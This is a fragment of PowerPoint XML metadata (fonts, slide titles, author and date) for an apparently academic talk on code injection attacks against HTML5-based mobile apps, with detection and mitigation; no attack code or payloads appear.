                  <a:srgbClr val="004E8A"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:rPr>
              <a:t>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3A81BA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3A81BA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3A81BA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3A81BA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1855</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>422</Paragraphs>
  <Slides>67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9" baseType="lpstr">
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Merriweather</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Constantia</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Default</vt:lpstr>
      <vt:lpstr>Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hybrid Apps</vt:lpstr>
      <vt:lpstr>App Development Comparison</vt:lpstr>
      <vt:lpstr>Architecture of a hybrid app</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Architecture of a hybrid app PhoneGap – Open Source Framework</vt:lpstr>
      <vt:lpstr>PhoneGap Architecture</vt:lpstr>
      <vt:lpstr>HTML5-based Mobile App and Risk</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Overview of HTML5-based Mobile App</vt:lpstr>
      <vt:lpstr>Overview of PhoneGap Architecture</vt:lpstr>
      <vt:lpstr>Example: raising a native alert from JS code </vt:lpstr>
      <vt:lpstr>Example: accessing the camera </vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Risks in HTML5-based Mobile App (JavaScript)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 (Video)</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Related work</vt:lpstr>
      <vt:lpstr>Hybrid apps</vt:lpstr>
      <vt:lpstr>Hybrid apps</vt:lpstr>
      <vt:lpstr>AddJavaScriptInterface Vulnerability</vt:lpstr>
      <vt:lpstr>AddJavaScriptInterface Vulnerability</vt:lpstr>
      <vt:lpstr>Other Static Analysis in Android</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Code Injection Attacks on HTML5-based Mobile App</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Attack (XSS)</vt:lpstr>
      <vt:lpstr>Overview of our Attack</vt:lpstr>
      <vt:lpstr>Condition1: Attack Channels</vt:lpstr>
      <vt:lpstr>Condition2: Display APIs(Triggering Code)</vt:lpstr>
      <vt:lpstr>Vulnerable Code Example</vt:lpstr>
      <vt:lpstr>Achieving Damage</vt:lpstr>
      <vt:lpstr>Real Vulnerable App Example</vt:lpstr>
      <vt:lpstr>Real Vulnerable App Example</vt:lpstr>
      <vt:lpstr>Detection of Code Injection Attacks on HTML5-based Mobile App</vt:lpstr>
      <vt:lpstr>Challenges</vt:lpstr>
      <vt:lpstr>Framework Modeling </vt:lpstr>
      <vt:lpstr>Evaluation</vt:lpstr>
      <vt:lpstr>Case Study (The most powerful ones)</vt:lpstr>
      <vt:lpstr>Mitigation of Code Injection Attacks on HTML5-based Mobile App</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>WiFi Demo (SSID Length Limitation)</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>When mobile meets web…</vt:lpstr>
      <vt:lpstr>When mobile meets web…</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Conclusion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 Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation</dc:title>
  <dc:creator>ychen</dc:creator>
  <cp:lastModifiedBy>ychen</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-02-03T05:06:31Z</dcterms:modified>
</cp:coreProperties>
</file>